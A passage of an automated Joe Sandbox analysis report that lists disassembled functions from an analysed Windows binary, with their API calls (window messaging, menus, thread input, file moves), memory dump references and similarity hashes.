                                                Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                • _wcslen.LIBCMT ref: 00450720
                                                • _wcscat.LIBCMT ref: 00450733
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                • String ID: -----$SysListView32
                                                • API String ID: 4008455318-3975388722
                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                • GetParent.USER32 ref: 00469C98
                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                • GetParent.USER32 ref: 00469CBC
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 2360848162-1403004172
                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                • String ID:
                                                • API String ID: 262282135-0
                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                                                • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                • String ID:
                                                • API String ID: 3771399671-0
                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 0-1603158881
                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateMenu.USER32 ref: 00448603
                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                • IsMenu.USER32(?), ref: 004486AB
                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                • DrawMenuBar.USER32 ref: 004486F5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                • String ID: 0
                                                • API String ID: 161812096-4108050209
                                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                • String ID:
                                                • API String ID: 978794511-0
                                                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$_memcmp
                                                • String ID: '$\$h
                                                • API String ID: 2205784470-1303700344
                                                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                • __swprintf.LIBCMT ref: 0045EC33
                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                Strings
                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                • API String ID: 2441338619-1568723262
